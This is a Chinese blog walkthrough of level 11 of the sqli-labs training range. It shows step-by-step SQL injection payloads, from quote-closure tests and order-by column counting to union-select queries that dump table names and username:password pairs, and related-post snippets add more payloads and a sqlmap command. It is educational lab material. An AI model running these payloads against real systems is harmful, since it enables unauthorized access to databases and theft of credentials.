sql注入第11关

空白行

已于 2022-04-15 15:43:22 修改

阅读量4k

点赞数 2

分类专栏： OWASP 文章标签： sql 数据库 web安全

于 2022-03-14 17:55:26 首次发布

本文链接：https://blog.csdn.net/qq_45751902/article/details/123481617

版权

OWASP 专栏收录该内容

12 篇文章 2 订阅

订阅专栏

这关采用post的方式传参

定闭合符
使用’ or 1=1 # 回显正常
在这里插入图片描述

使用" or 1=1 #，回显报错（可以尝试更多的闭合符，这里就不一一实现了）
在这里插入图片描述
实现原理

在这里插入图片描述
查询列数
admin’ order by 2 #

’ order by 3 #
在这里插入图片描述
所以有两列

找显示位
在这里插入图片描述
查数据库名

'union select 1,database()#

在这里插入图片描述
查表名

' union select 1,group_concat(table_name) from information_schema.tables where table_schema='security'#

在这里插入图片描述
查列名

' union select 1,group_concat(column_name) from information_schema.columns where table_name='users'#

在这里插入图片描述
查列值

' union select 1,group_concat(username,0x3a,password) from users#

在这里插入图片描述

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

空白行

关注关注

2
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

专栏目录

第十九节宽字节SQL注入-01

09-15

宽字节SQL注入是一种特殊类型的SQL注入攻击，主要针对使用宽字节字符集（如GBK、UTF-16等）的数据库管理系统。宽字节SQL注入攻击的关键在于exploit宽字节字符集的特性来 bypass 数据库的安全机制。宽字节字符集 ...

通过sql-labs进行sql注入学习(11-22)

Lemon's blog

10-27

477

前言：SQL注入还是不够精通，继续训练！第十一关尝试万能密码' or 1=1#,有回显，看来是单引号闭合，抓包进行操作，还是回显注入，不过是从GET方式变成了POST方式 payload: 判断列数 uname=' order by 1,2,3# 查找数据库 uname=' union select 1,database()# 查表 uname=' union select 1,group_...

参与评论您还未登录，请先登录后发表或查看评论

【sqli-labs靶场】第11关

qq_61019688的博客

04-26

849

知道了sql语句，接下来就是构造sql语句来进行查询，例如1’ or 1=1#（注意此处不能再使用and来构造恒真语句，因为我们不知道username和password，所以要想判断sql语句是否执行要使用or，这样or后面的语句为true则执行，为false则报错）（还有一个注意点的此处不能再用--+来注释，要使用#）1’ order by 2#，无返回内容，由此可以判断出列数应该是2，对于为啥order by 2无内容返回因为是可能不存在username=1，所以查不到内容。1’ or 1=2#报错。

SQLi-LABS【11-15关】通关攻略

最新发布

qq_65852138的博客

08-19

476

SQLi-LABS【11-15关】通关攻略

sqli-labs基础篇第11~17关

Lucky小小吴的小屋

01-23

1452

sqli-labs基础篇第11~17关

bwapp---sql注入第十一关过关过程及分析

weixin_45821250的博客

12-07

301

报错没爆出来，但是插入的方式解决了。SQL Injection - Stored (Blog)

sqli-labs关卡11(基于post提交的单引号闭合的字符型注入)通关思路

zyh1588的博客

11-06

643

小白回顾sqli-labs靶场第十一关

第十一节 HTTP头中的SQL注入-01

09-15

Sqlmap是一款强大的自动化SQL注入工具，它可以检测和利用SQL注入漏洞。以下是一些使用Sqlmap进行测试的例子： - **自动搜索POST表单注入**：`sqlmap.py -u "http://ip/sqltest/post.php" --forms` 这条命令会检测...

第十三节 SQL注入绕过技术-01

09-15

在 Web 应用程序中，SQL 注入攻击是最常见的安全漏洞之一。攻击者可以通过注入恶意 SQL 代码来访问或修改敏感数据。为了防止 SQL 注入攻击，开发者通常会对用户输入进行过滤和校验。但是，攻击者总是可以找到 ways ...

第十七节绕过剔除空格的SQL注入-01

09-15

绕过剔除空格的SQL注入是Web应用安全中的一种常见攻击方式。SQL注入攻击是指攻击者将恶意的SQL代码注入到Web应用的数据库中，以获取或修改敏感数据。在本节课程中，我们将介绍绕过剔除空格的SQL注入的基础知识、去除...

超级SQL注入工具【SSQLInjection】V1.0 正式版 20201112

09-22

【SQL注入】是一种常见的网络安全漏洞，它发生在Web应用程序中，允许攻击者通过构造恶意的SQL语句来控制或获取数据库中的敏感信息。SQL注入通常利用了开发者在编写动态SQL查询时对用户输入数据的安全过滤不足。这个...

SQL注入及解决办法

mulinghanxue的博客

07-10

715

SQL注入:(查询的百度解释如下) 所谓SQL注入，就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串，最终达到欺骗服务器执行恶意的SQL命令。具体来说，它是利用现有应用程序，将（恶意的）SQL命令注入到后台数据库引擎执行的能力，它可以通过在Web表单中输入（恶意）SQL语句得到一个存在安全漏洞的网站上的数据库，而不是按照设计者意图去执行SQL语句。比如先前的很多影视网站泄...

sql注入靶场闯关Basic（11-15关POST型）详细版

Zqinglele的博客

04-10

1068

1.从这关开始变成登录框输入，尝试登录一下，只有一个登录错误回显2.在用户名处使用 ' 进行注释，发现出现了sql语句错误提醒，说明是通过单引号进行闭合。

web安全/渗透测试（十一）：SQL注入

蓝泽兮的博客

04-14

544

一、SQL语句增删改查二、SQL注入的危害 1、提供对数据库敏感数据的访问 2、可以读取www文件夹外的本地文件 3、可以用admin登录并进一步对系统进行漏洞发掘 4、可以用来上传文件三、发现SQL注入 1、使用‘and’，'order by'或“ '”在文本框和url注入其中url形式为：http://baidu.com/page.php?something=som...

SQL注入详解 11-22关

君莫hacker的博客

09-28

1047

目录Less-11（POST传参，联合注入）Less-12（floor报错注入）Less-13（updatexml()报错注入）Less-14 Less-11（POST传参，联合注入）第11关总结：第十一关与前面的关卡不太相同，这里采用了POST传参，我们需要借助浏览器插件或者抓包工具对其参数进行修改。用户名与密码均为admin，登录成功后会回显出用户名及密码，所以我们可以尝试在参数uname与参数passwd处尝试进行注入，经过判断，发现在参数uname处存在单引号字符型注入，并且有回显能判断出字段

sqli-labs-----第11关

wyzhxhn的博客

11-09

2008

基于错误的POST型单引号字符型注入

SQL 联合注入（injection 第一关）

baishiqi12的博客

08-14

619

仅供参考

SQL注入学习之路：sqli-labs靶场实战解析

"sqli-labs靶场练习笔记涵盖了从2关到24关的SQL注入学习内容，适合初学者参考，涉及单引号、双引号注入，布尔盲注，数据库名、表名、列名的探测，以及利用注入进行文件写入和信息获取等技能。" 在SQL注入的学习过程...